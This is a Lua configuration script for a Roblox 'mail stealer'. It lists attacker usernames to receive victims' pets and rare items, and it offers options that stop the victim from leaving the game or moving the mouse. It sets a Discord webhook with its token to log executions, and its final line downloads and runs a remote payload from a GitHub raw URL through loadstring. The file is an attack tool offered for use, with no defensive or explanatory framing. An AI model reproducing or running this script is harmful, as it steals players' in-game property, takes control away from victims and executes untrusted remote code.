--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--
UserName = "M7AMADFBI9" --// Username To Send Pets To
UserName2 = "zirak123zaxo" --// To Send Rare Stuff

_G.LoadingScreen = false --// make it true for loading screen
_G.AntiLeave = false --// Doesn't Let The Target Close Roblox
_G.MouseLock = false --// Doesn't Let the Target Move Mouse

--[[ Webhook Config ]]--
Webhook = "https://discord.com/api/webhooks/1120455712217251890/JsOTfQ_DLPz-zHgDpgmKlSvmMkz_6OTPMFTIsytACufZT4xbjSSKZNMpg0U83moLQ95T" --// Discord Webhook For Executions

--[[ Script ]]--
loadstring(game:HttpGet("https://raw.githubusercontent.com/LucidHacker9999/Mailstealer/main/script.lua"))()
